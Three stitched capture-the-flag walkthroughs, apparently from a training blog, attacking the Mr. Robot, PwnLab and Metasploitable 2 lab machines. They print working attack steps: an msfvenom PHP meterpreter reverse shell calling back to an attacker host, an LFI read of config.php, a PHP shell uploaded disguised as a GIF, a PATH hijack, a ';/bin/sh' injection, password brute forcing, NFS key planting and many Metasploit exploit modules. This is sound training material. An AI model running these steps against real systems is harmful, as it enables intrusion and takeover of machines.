Hack the Mr. Robot VM (CTF Challenge)

his is our another article of root2boot penetration testing challenge. We will walk through a exploitable framework Mr. Robot. It is based on the TV show, Mr. Robot, it has three keys hidden in different locations. The main goal is to find all three tokens hidden in the system. Each key is progressively difficult to find. Breaking into it isn’t too difficult. There isn’t any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.

First Download the Mr Robot Lab from here

Penetrating Methodology:

·         Network Scanning (Nmap, netdiscover)

·         Recon (Nikto)

·         Use robot.txt

·         Grab 1st key

·         Download fsocity.dic file and use as dictionary

·         Wordpress password cracking (wpscan)

·         Login into Wordpress

·         Generate PHP Backdoor (Msfvenom)

·         Upload and execute a backdoor

·         Reverse connection (Metasploit)

·         Get MD5 hash and decrypt it

·         Import python one-liner for proper TTY shell

·         Find / perm u=s for Privilege Escalation

·         Get Root access and capture the flag.

First of all we have to find its IP address and for that go to the terminal of your Kali and type :

netdiscover

Upon the execution of the above command we will know about all the IP addresses in our network. Our target IP is 192.168.1.103, let us scan it.

To scan our target IP we will use aggressive scan (-A)

nmap -p- -A 192.168.1.103

The scan’s result shows us the open ports are: 22, 80, and 443. As the 80 port is open we can try and open this IP in our browser.

And yes, it opens which further confirms our target.

Next we will apply nikto command to it. Nitko command will help us to gather information like its files and all the other major stuff that we ought to know about our target. So, therefore, type:

nitko -h 192.168.1.103

From the result we can gather that there a text file with the name of robots.txt which might provide us with some further information. Moreover it also tell us that wordpress installation was found.

So now let us try to open robots.txt in the browser. Yesssssssss!! It gave something to us let open each file one-by-one.

Excellent!!! Inside key-1-of-3.txt we found our 1^st key.

Now open fsocity.dic file in browser which is a dictionary file. Let us first try and open this dictionary file the browser. Once we open the said dictionary file in the browser, it asks us to download it. Going ahead we downloaded and opened it. It is a file which may contains username or passwords.

So now we know that we might have username or passwords, we will try and logon into our target. One by one we have tried every username and it has given the error that the username doesn’t exist.  But when we used the name elliot it gave us the error that the password is empty.

With this we know one thing for sure that elliot is a correct username and now we just have to find a password for it.

Our best guess to find the password the same dictionary file from which we found the username. Thus, moving forward we will use WPScan to find our password from the same file.

wpscan -u http://192.168.1.103/--username Elliot --wordlist /root/Desktop/fsocity.dic

When the execution is completed (which may time much time as in our case it took almost 4 hours) you will have the password for the username elliot which is ER28-0652.

Using the password, logon in to the wordpress and open 404 template to add a new theme.

One you have logged in, make the malicious file that you got to upload in it. Generate code through msfvenom command:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.108 lport=4444 -f raw

On other hand run multi/handler inside Metasploit framework.

Copy the code from  to die(); and paste it on template(and save it)

Now you have access to a WordPress admin console is to replace one of the theme templates with some PHP of your own. I decided to try for a reverse shell by editing the 404.php theme and replacing the contents with the msfvenom generated shell.

Once the php code is saved, then, open the path of the template in the browser as shown:

Browsing to http://192.168.1.103/wp-content/themes/twentyfifteen/404.php and press enter

Meanwhile, return to the Metasploit terminal and wait for the metepreter session by exploiting multi handler.

msf use exploit/multi/handler

msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp

msf exploit(multi/handler) set lhost 192.168.1.108

msf exploit(multi/handler) set lport 4444

msf exploit(multi/handler) exploit

From given below image you can observe Meterpreter session 1. But task is not finished yet, still we need to penetrate more for privilege escalation.

cd home

ls

Now, to know the information about the robot folder/file we will type:

We now know that there are two important files, one of them is a text file other is password in the form of MD5. If we try to open the text file by typing:

cat key-2-of-3.txt

It will not open as we do not have the permission to do so. But now let us try and open the MD5 file and for that type:

cat password.raw-md5

Executing the above command will give a MD5 value (hash value) of the password as you can see below:

We will use md5 online decrypting tool for cracking this MD5 value. Enter the MD5 value in to the hash box and obtain the result. The value will translate to abcdefghijklmnopqrstuvwxyz as shown below.

Then to access proper TTY shell we had import python one line script by typing following:

Shell

python -c 'import pty;pty.spawn("/bin/bash")'

Now in the terminal try to switch the user to robot by the command:

su robot

Following the command it will ask you for the password. Enter the MD5 cracked password here and you will enter the robot user and to gain its information type:

ls

Now, try to open the remaining text file by typing:

cat key-2-of-3.txt

Here I will read the second key file

Now let’s find out all those files having root privilege by using following command.

find / -perm -u=s -type f 2>/dev/null

It has shown so many binary files but I was interested in nmap from its output result.

Nmap supported an option called “interactive.” With this option, users were able to execute shell commands by using an nmap “shell” (interactive shell). 

Next type the following:

nmap --interactive

With the above commands you will enter nmap then type:

!sh

id (to know the users)

cd /root (lets you to enter root)

Once you have entered the root, type:

ls -lsa

cat key-3-of-3.txt

And upon the execution of we will obtain 3 of 3 keys, hence entering Mr. Robot. There are many ways to perform the above but this methods is the easiest. We hope you find it effective and interesting and it helps you to improve.

Penetration Testing in PwnLab (CTF Challenge)

In this article, we will walkthrough a root2boot penetration testing challenge i.e PwnLab. PwbLab is a vulnerable framework, based on the concept of CTF (capture the flag), with a bit of security which is a little complicated to bypass. But it's not impossible. So, let us learn how we can get its access.

Download From Here

Penetrating Methodology:

Network Scanning (Nmap, netdiscover)

Information Gathering (Nikto)

Abusing config.php file (curl & PHP filter convert)

Obtain Mysql Database credential

Extract user credential from Mysql Database

Login to web application

Upload webshell (PHP reverse shell)

Executing Uploaded PHP backdoor (Burp suit)

Netcat session

Import python one-liner for proper TTY shell

Find SUID Binaries

Privilege Escalation by Manipulating $PATH

Get Root access and capture the flag.

Let’s Start!!!

Now to start let us, firstly, consider that we do not know the IP of the PwnLab, therefore search for the IP address beforehand and for that there is a command that shows us all the IP's present in our network, so go to the terminal of you Kali and type :

netdiscover

Target IP = 192.168.1.103

And to know that we start our penetration testing. So, first, we will now scan with nmap, we will apply an aggressive scan as it gives detailed information and is fast. The command is :

nmap -A 192.168.1.13

We have the result of scanning and as you can see there are only three ports open and they are 80, 111, 3306. It is our best shot but also to be sure let us check this IP on our browser. In the browser, we can see that PwnLab has three pages: home, login and upload. To enter the server we have to upload our code into it and for we must know username and password.

As we need to know about username and password, we will use nikto command to find out the file which is storing them. Nikto helps us to know all the file names and the data they are containing. And the command to for this is:
nikto -h http://192.168.1.103
As you can see /config.php: PHP Config file may contain database IDs and password is the file that has username and passwords. Moreover, login.php for admin login page is found.

So when we open target IP on the browser and explore Login tab then it gives login form as shown below. As we were unaware of its login credential thus we try SQL injection techniques but nothing was useful now the last options was to use CURL. If you will observe the URL http://192.168.1.103/?page=login then you can count that its look like that LFI.

But it was not easy that much to exact information by exploiting LFI with help of ../etc/password therefore by making little bit more effort and taking help from my previous article we used curl command to find out the data from inside config.php file with the help of PHP base64-encode.

curl http://192.168.1.103/index.php?page=php://filter/convert.base64-encode/resource=config

And the highlighted part of the above image is our result and has the information about username and passwords. But note that the information is in base64 code which we will have to decode in order to read it. In order to decode copy the base 64 text and follow below syntax.

echo ‘base 64 encoded text’ | base64 -d

Thus we found the following information after decoding.

$server   = "localhost";

$username = "root";

$password = "H4u%QJ_H99";

$database = "Users";

So, the username is root and password is H4u%QJ_H99.

Now we use MySQL command to see the username and passwords. And the lSQL command is:

mysql -h 192.168.1.103 -u root -p Users

After typing the command it asks the password, so here enter the decoded password and press enter.

kent | Sld6WHVCSkpOeQ

mike | U0lmZHNURW42SQ

kane | aVN2NVltMkdSbw

And so, you will have the usernames and password as in this case the usernames are kent, mike, Kane with their passwords in base64 code.

To decode each password follow the same method using echo command with -d option as shown and thus you will decode the password.

Kent: JWzXuBJJNy

Mike: SIfdsTEn6I

Kane:  Sv5Ym2GRo

By using Kane credential, we login successfully, with help of upload option we can upload any image.

Here, upload option is like a dynamic opportunity for us, because through this we can upload any backdoor file for reverse connections. We know that in Kali Linux there are several PHP backdoors among those we have used usr/share/webshell/php/php-reverse-shell. BUT you need to modify it by adding GIF98 and save as shell.gif because here you can able to upload only a file with extension GIF, png and img.

After changing the extension when you will try to upload the file you will succeed. Now the uploaded file must be executed at once to achieve reverse connection. Once the file is uploaded, we still need a way to execute this file. And for that right click on that file and click on copy image location option. Further open a new terminal to start Netcat listen for the reverse connection.

nc -lvp 1234

Now capture its HTTP request inside burp suit or tamper data. Here its shows that the “lang” parameter is set as a cookie and might be it could use for our malicious file execution. Inside the cookie option delete whatever was written and type:

lang=../*Image location path*

Here,

*image location path* is the path of the file that you uploaded and had copied it after that.

Once above said changes are done then forward the intercepted request and open the terminal where netcat listener was activated here you will find the reverse connection of victim's machine. To access proper tty shell execute below command, start penetrating more to get the flag.

python -c 'import pty; pty.spawn("/bin/sh")'

cd /home

ls

su kane

iSv5Ym2GRo

Here,

su –> denotes the switch user

kane –> the user you want to switch to

iSv5Ym2GRo –> is the password

Next, if you type ls command you will that there is a folder named home in the user that we just entered. So, will go into that folder and to do so, type;

cd home

 ls

cd kane

ls

Then by using the following command, you can enumerate all binaries having SUID permission.

find / -perm -u=s -type f 2>/dev/null

As you can see in the image below, there is a file in Kane user called msgmike.  Let us try to open it and therefore, type :

./msgmike

So we will try to run msgmike file, it put up an error message "cat: /home/mike/msg.txt No such file or directory" 

The most important things which should be considered here that the author has set SUID bit ON for msgmike file and might be there could be any small program file which is calling system binaries such cat to a read file from inside given path i.e. /home/mike/msg.txt  but the cat fails to find msg.txt file or directory. Taking its advantage, we will try to manipulate the environment PATH variable for cat to execute our /bin/bash command under user Mike.

To do this follow below steps:

echo $PATH

echo ‘/bin/sh’ > cat

chmod 777 cat

export PATH=./:$PATH

Now again run msgmike file and you will get user Mike access. Hence above all steps was performed in direction of privilege escalation for user Mike but the root escalation is connected to phase indirectly as mike has a file msg2root which will take any Input command as the message to root.

cd mike

ls

So when you will run the msg2root file, it will ask you enter the message for root which will be considered as an input value and you can utilize this opportunity for privilege escalation as shown.

./msg2root

test; /bin/sh

id

cd /root

cat flagt.txt

HURRAYYYYYYYYYYYYY!! We hit the Goal and solved this challenges.

Penetration Testing Skills Practice with Metasploitable (Beginner Guide)

If you’ve ever tried to learn about pentesting you would have come across Metasploitable in one way or another. In this article we will be exploiting all the services running in Metasploitable 2, so without further ado, let’s dive in.

Table of Content

§  Network Scan

§  Exploiting Port 21 FTP (Hydra)

§  Exploiting VSFTPS 2.3.4

§  Exploiting Port 22 SSH

§  Bruteforce Port 22 SSH (RSA Method)

§  Exploiting port 23 TELNET (Credential Capture)

§  Exploiting TELNET (Bruteforce)

§  Port 25 SMTP User Enumeration

§  Exploiting Port 80 (PHP)

§  Exploiting Port 139 & 445 (Samba)

§  Exploiting Port 8080 (Java)

§  Exploiting Port 5432 (Postgres)

§  Exploiting Port 6667 (UnrealIRCD)

§  Exploiting Port 36255

§  Remote Login Exploitation

§  Remote Shell Exploitation

§  Exploiting Port 8787

§  Bindshell

§  Exploiting Port 5900 (VNC)

§  Access Port 2121 (ProFTPD)

§  Exploiting Port 8180 (Apache Tomcat)

§  Privilege Escalation via NFS

§  Exploiting Port 3306 (MYSQL)

Network Scan

The first step towards doing what we want to achieve is a service scan that looks at all the 65535 ports of Metasploitable 2 to see what’s running where and with what version. You will notice the result in the image below.

nmap -p- -sV 192.168.1.103

Exploiting Port 21: FTP

We have all our ports and services listed now, let’s start by Exploiting port 21 running FTP. We will be using Hydra for this. The two wordlists for this operation will have default login names and passwords.

Hydra shows us that we have 4 valid login ID’s and passwords.

hydra -L user.txt -P pass.txt 192.168.1.103 ftp

Let’s put our findings to use and try to connect using ftp.

ftp 192.168.1.103

 

Exploiting VSFTPS 2.3.4

We have exploited the service running on port 21, now we will exploit the particular version of the FTP service. We will be searching for an exploit for VSFTPD 2.3.4 using Searchsploit.

searchsploit vsftpd

We now have our exploit, let’s get into Metasploit and run it.

This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011.

msf > use exploit/unix/ftp/vsftpd_234_backdoor

msf exploit (unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.1.103

msf exploit (unix/ftp/vsftpd_234_backdoor) > exploit

And as you can observe, we have owned command shell of remote machine.

Exploiting Port 22 SSH

Metasploit has an auxiliary function that we will use on the SSH service running on port 22. One we get our session through it we will be upgrading it to Meterpreter.

This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

msf > use auxiliary/scanner/ssh/ssh_login

msf auxiliary (scanner/ssh/ssh_login) > set rhosts 192.168.1.103

msf auxiliary (scanner/ssh/ssh_login) > set user_file /root/Desktop/user.txt

msf auxiliary (scanner/ssh/ssh_login) > set pass_file /root/Desktop/pass.txt

msf auxiliary (scanner/ssh/ssh_login) > exploit

And as you can observe, again we have owned command shell of remote machine.

Bruteforce Port 22 SSH (RSA Method)

This time we will bruteforce the SSH service using a 5720.py exploit. The exploit comes with RSA keys that it used to bruteforce the root login. We will basically be running the exploit by giving it the the path to the RSA keys we want to use and the IP of the target machine. Here’s how it works.

python 5720.py 5622/rsa/2048/ 192.168.1.103 root

Success! It finds the right key pretty quick and gives the exact command to execute to get a successful connection.

Exploiting port 23 TELNET (Credential Capture)

We are using Wireshark to capture the TCP traffic, it is set to run in the background while we connect to Metasploitable 2 through telent using “msfadmin” as credentials for user name and password.

telnet 192.168.1.103

Once successfully connected we go back to Wireshark. Now we click the “TCP Stream” option under Analyze > Follow. This shows us the login credentials in plain text.

Exploiting TELNET

This module will test a telnet login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. The same password and user file from earlier will be used for this.

msf > use auxiliary/scanner/telnet/telnet_login

msf auxiliary (scanner/telnet/telnet_login) > set rhosts 192.168.1.103

msf auxiliary (scanner/telnet/telnet_login) > set user_file /root/Desktop/user.txt

msf auxiliary (scanner/telnet/telnet_login) > set pass_file /root/Desktop/pass.txt

msf auxiliary (scanner/telnet/telnet_login) > set stop_on_success true

msf auxiliary (scanner/telnet/telnet_login) > exploit

Port 25 SMTP User Enumeration

Kali comes with a tool called “Smtp-User-Enum”, it’s has multiple modes that deal with different facets of SMTP, we will be using it to verify which SMTP usernames exist in victim machine.

We will see that the tool lets us know which all usernames exist that I have saved in my user.txt file.

smtp-user-enum -M VRFY -U user.txt -t 192.168.1.103

Exploiting Port 80 (PHP_CGI)

We know that port 80 is open so we type in the IP address of Metasploitable 2 in our browser and notice that it is running PHP. We dig a little further and find which version of PHP is running and also that it is being run as a CGI. We will now exploit the argument injection vulnerability of PHP 2.4.2 using Metasploit.

When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability. This module takes advantage of the -d flag to set php.ini directives to achieve code execution. From the advisory: "if there is NO unescaped '=' in the query string, the string is split on '+' (encoded space) characters, urldecoded, passed to a function that escapes shell metacharacters (the "encoded in a system-defined manner" from the RFC) and then passes them to the CGI binary." This module can also be used to exploit the plesk 0day disclosed by kingcope and exploited in the wild on June 2013.

msf > use exploit/multi/http/php_arg_injection

msf exploit (multi/http/php_arg_injection) > set rhost 192.168.1.103

msf exploit (multi/http/php_arg_injection) > exploit

Exploiting Port 139 & 445 (Samba)

Samba is running on both port 139 and 445, we will be exploiting it using Metasploit. The default port for this exploit is set to port 139 but it can be changed to port 445 as well.

msf > use exploit/multi/samba/usermap_script

msf exploit (multi/samba/usermap_script) > set rhost 192.168.1.103

msf exploit (multi/samba/usermap_script) > exploit

Exploiting Port 8080 (Java)

This module takes advantage of the default configuration of the RMI Registry and RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it invokes a method in the RMI Distributed Garbage Collector which is available via every RMI endpoint, it can be used against both rmiregistry and rmid, and against most other (custom) RMI endpoints as well. Note that it does not work against Java Management Extension (JMX) ports since those do not support remote class loading, unless another RMI endpoint is active in the same Java process. RMI method calls do not support or require any sort of authentication.

We will be using the Remote Method Invocation exploit on the Java service running on port 8080. It’s quite straight forward, just choose the exploit, set the target machine IP and that’s it.

msf > use exploit/multi/misc/java_rmi_server

msf exploit (multi/misc/java_rmi_server) > set rhost 192,168.1.103

msf exploit (multi/misc/java_rmi_server) > exploit

Exploiting Port 5432 (Postgres)

Postgres is associated with SQL is runs on port 5432 and we have a great little exploit that can be used here.

On some default Linux installations of PostgreSQL, the postgres service account may write to the /tmp directory, and may source UDF Shared Libraries from there as well, allowing execution of arbitrary code. This module compiles a Linux shared object file, uploads it to the target host via the UPDATE pg_largeobject method of binary injection, and creates a UDF (user defined function) from that shared object. Because the payload is run as the shared object's constructor, it does not need to conform to specific Postgres API versions.

msf > use exploit/linux/postgres/postgres_payload

msf exploit (linux/postgres/postgres_payload) > set rhost 192.168.1.103

msf exploit (linux/postgres/postgres_payload) > exploit

Exploiting Port 6667 (UnrealIRCD)

Port 6667 has the Unreal IRCD service running, we will exploit is using a backdoor that’s available in Metasploit.

This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor

msf exploit (unix/irc/unreal_ircd_3281_backdoor) > set rhost 192.168.1.103

msf exploit (unix/irc/unreal_ircd_3281_backdoor) > exploit

Exploiting Port 36255

This is a weakness that allows arbitrary commands on systems running distccd. We will be using Distcc Daemon Command Execution. This module uses a documented security weakness to execute arbitrary commands on any system running distccd.

msf > use exploit/unix/misc/distcc_exec

msf exploit (unix/misc/distcc_exec) > set rhost 192.168.1.103

msf exploit (unix/misc/distcc_exec) > exploit

Remote Login Exploitation

Remote login is a tool that was used before ssh came into the picture. Since we have the login credentials for Metasploitable 2, we will be using Rlogin to connect to it, using the “-l” flag to define the login name.

rlogin -l msfadmin 192.168.1.103

Metasploit has a module in its auxiliary section that we can use to get into the rlogin.

msf > use auxiliary/scanner/rservices/rlogin_login

msf auxiliary (scanner/rservices/rlogin_login) > set rhosts 192.168.1.103

msf auxiliary (scanner/rservices/rlogin_login) > set username root

msf auxiliary (scanner/rservices/rlogin_login) > exploit

Remote Shell Exploitation

Remote shell Protocol is another way to gain remote shell, it is a legitimate service that we will use to access the target machine with login credentials to run a certain command.

rsh -l msfadmin 192.168.1.103 ifconfig

Exploiting Distributed Ruby Remote Code Execution (8787)

Now that we know that this service is running successfully, let’s try to exploit it using Metasploit.

This module exploits remote code execution vulnerabilities in dRuby.

msf > use exploit/linux/misc/drb_remote_codeexec

msf exploit (linux/misc/drb_remote_code) > set rhost 192.168.1.103

msf exploit (linux/misc/drb_remote_code) > exploit

Bindshell Exploitation

Metasploitable 2 comes with an open bindshell service running on port 1524. We will be using Netcat to connect to it.

nc 192.168.1.103 1524

Exploiting Port 5900 (VNC)

Virtual Network computing or VNC service runs on port 5900, this service can be exploited using a module in Metasploit to find the login credentials.

This module will test a VNC server on a range of machines and report successful logins. Currently it supports RFB protocol version 3.3, 3.7, 3.8 and 4.001 using the VNC challenge response authentication method.

msf > use auxiliary/scanner/vnc/vnc_login

msf auxiliary (scanner/vnc/vnc_login) > set login 192.168.1.103

msf auxiliary (scanner/vnc/vnc_login) > exploit

Let’s put what we’ve found to the test by connecting using the vncviewer

vncviewer 192.168.1.103

The credentials work and we have a remote desktop session that pops up in Kali.

Access Port 2121 (ProFTPD)

We will connect to the target machine using Telnet running on port 2121 using the default credentials for Metasplotable 2.

telnet 192.168.1.103 2121

Exploiting Port 8180 (Apache Tomcat)

We saw during the service scan that Apache Tomcat is running on port 8180.  Incidentally, Metasploit has an exploit for Tomcat that we can use to get a Meterpreter session. The exploit uses the default credentials used by Tomcat to gain access.

This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a jsp application using a POST request against the /manager/html/upload component. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.

msf > use exploit/multi/http/tomcat_mgr_upload

msf exploit (multi/http/tomcat_mgr_upload) > set rhost 192.168.1.103

msf exploit (multi/http/tomcat_mgr_upload) > set rpost 8108

msf exploit (multi/http/tomcat_mgr_upload) > set httpusername tomcat

msf exploit (multi/http/tomcat_mgr_upload) > set httppassword tomcat

msf exploit (multi/http/tomcat_mgr_upload) > exploit 

Privilege Escalation via Port 2049: NFS

In this method we will be creating a ssh key without a passphrase and exchanging it with the ssh key of the victim machine for the root user.

First, we use ssh-keygen to generate a RSA keypair without a key phrase, then we place it in the “/root/.ssh” folder where the key is found by default.  Once the key is created and placed, we will create a directory “/tmp/sshkey/” in our local machine.

The next part is a little tricky, we will be mounting the directory we just made on the victim machine using the Network File Sharing Function. Once mounted we write the key from our machine to the victim’s machine, a sort of an override, using the cat command. The thing to keep in mind here is that the key we have is without a passphrase so the after the override the key in the victim machine is also without a passphrase, so when it is connected using ssh, it’s using a blank password.

The key is now copied so we unmount the directory and connect as the root user using ssh.

showmount -e 192.168.1.103

ssh-keygen

mkdir /tmp/sshkey

mount -t nfs 192.168.1.103:/ /tmp/sshkey/

cat ~/ .ssh/id_rsa.pub >>/tmp/sshkey/root/ .ssh/authorized_keys

umount /tmp/sshkey

ssh root@192.168.1.103

Exploiting Port 3306 (MYSQL)

The mySQL database in Metasploitable 2 has negligible security, we will connect to it using the mySQL function of Kali by defining the username and host IP. The password will be left blank.

mysql -u root -h 192.168.1.103 -p

 

This article is a gateway into the world of pentesting. Its intent is to give you a single source containing all the ways and means to exploit all the vulnerabilities of Metasploiable 2 classified by port’s and services, it doesn’t get any better than this.